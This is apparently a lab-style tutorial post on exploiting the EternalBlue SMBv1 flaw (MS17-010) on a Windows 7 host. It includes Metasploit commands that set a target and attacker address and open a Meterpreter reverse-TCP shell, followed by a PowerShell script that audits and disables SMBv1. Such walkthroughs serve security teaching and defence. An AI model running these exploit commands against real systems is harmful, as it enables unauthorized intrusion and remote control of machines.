personstom
This module is a port of the Equation Group ETERNAL BLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memory operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with a mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.
Let’s start!!!
Attacker: Kali Linux
Target: Windows 7
Open a terminal in Kali Linux and type msfconsole to load the Metasploit framework.
Code:
msfconsole

Code:
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.21
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > exploit
The screenshot shows that we have obtained a Meterpreter session: the buffer overflow was exploited by overwriting an SMBv1 buffer.
Code:
meterpreter> sysinfo
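The Windows 7 target above was exploitable because it exposed SMBv1 without the MS17-010 update. The following PowerShell is an added example for the defensive side, not part of the original post or of the Metasploit module: run on the Windows 7 / Server 2008 R2 host from an elevated prompt, it reports whether the SMBv1 server is enabled and, with the -Apply switch, disables it using the registry value Microsoft documents for these OS versions (the Get-SmbServerConfiguration cmdlet does not exist on Windows 7). The function names are the example's own; the registry path and the SMB1 value are the real, documented switch.

```powershell
# Added example (not from the original post): audit and optionally disable the
# SMBv1 server on Windows 7 / Server 2008 R2. Run from an elevated PowerShell prompt.
param([switch]$Apply)

# Documented Microsoft location of the SMBv1 server switch on Windows 7 / 2008 R2.
$LanmanParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Smb1ServerState {
    # The SMB1 value is absent by default on Windows 7, which means SMBv1 is enabled.
    $v = Get-ItemProperty -Path $LanmanParams -Name SMB1 -ErrorAction SilentlyContinue
    if ($null -eq $v)       { return 'Enabled (SMB1 value absent, OS default)' }
    if ($v.SMB1 -eq 0)      { return 'Disabled' }
    return 'Enabled'
}

function Disable-Smb1Server {
    # Setting SMB1 to 0 turns the SMBv1 server off; the change takes effect after a reboot.
    Set-ItemProperty -Path $LanmanParams -Name SMB1 -Type DWORD -Value 0 -Force
}

$os = (Get-WmiObject Win32_OperatingSystem).Caption
Write-Host "Host OS            : $os"
Write-Host "SMBv1 server state : $(Get-Smb1ServerState)"

if ($Apply) {
    Disable-Smb1Server
    Write-Host "SMBv1 server state : $(Get-Smb1ServerState) (reboot required to apply)"
} else {
    Write-Host "Re-run with -Apply to disable the SMBv1 server."
}
```

Disabling SMBv1 removes the protocol the module talks to, but it is a mitigation, not a fix: the MS17-010 update is what closes the underlying hole, so the host should also be patched (check with Get-HotFix for the update applicable to that OS). Expect a reboot after the registry change, and verify first that nothing on the network (legacy printers, NAS devices) still depends on SMBv1.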

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a social media and gadgets lover.